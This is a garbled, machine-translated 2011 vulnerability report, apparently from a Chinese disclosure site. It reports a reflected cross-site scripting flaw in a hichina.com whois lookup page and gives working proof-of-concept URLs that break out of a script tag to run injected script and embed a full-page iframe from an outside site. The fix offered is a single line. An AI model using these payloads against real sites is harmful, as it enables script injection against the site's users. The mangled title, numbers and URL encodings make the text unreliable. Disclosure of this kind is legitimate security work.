Million network the Main Station due to filter poor lead to cross-site multi-use vulnerability-vulnerabilities and early warning-the black bar safety net

2011-01-21T00:00:00
ID MYHACK58:62201128911
Type myhack58
Reporter 佚名
Modified 2011-01-21T00:00:00

Description

Brief description: The Main Station is due to submit content security checks generated by the vulnerability

Detailed description: http://www.hichina.com/has_client/whois1.asp?tongyong=yes&domain=xxx&code=0 0 0 0 Modify the three variables in any one place for' Since the Universal network of security check found%,',and other similar special characters will appear in the prompt box and return to the previous page as shown in Figure

Here will produce a vulnerability

Vulnerability to prove: Modify the three variables to any one of</script>, closing the first half part of the code Error code error can not display the prompt box and back In</script>after adding any cross-site code as without any filter can be executed directly High-risk use example Add the following content

<iframe%20src="http://www.wooyun.org"%20width=1 0 0 0%20height=1 0 0 0% 2 0%20src="CenterForProducts.htm"%20id="CenterMainCenter"%2 0%20frameborder="no"%20border="0"%20marginwidth="0"%20marginheight="0"%20scrolling="no"%20allowtransparency="yes"></iframe>

For infinity box type Iframe Example address: 1. Basic example: http://www.hichina.com/has_client/whois1.asp?tongyong=yes&domain=</script><script>alert(/xss/)</script>&code=0' 2. Special application example: http://www.hichina.com/has_client/whois1.asp?tongyong=yes&domain=</script><iframe%20src="http://www.wooyun.org"%20width=1 0 0 0%20height=1 0 0 0% 2 0%20src="CenterForProducts.htm"%20id="CenterMainCenter"%2 0%20frameborder="no"%20border="0"%20marginwidth="0"%20marginheight="0"%20scrolling="no"%20allowtransparency="yes"></iframe>&code=0'

Repair solutions: Filter or modify the checking mechanism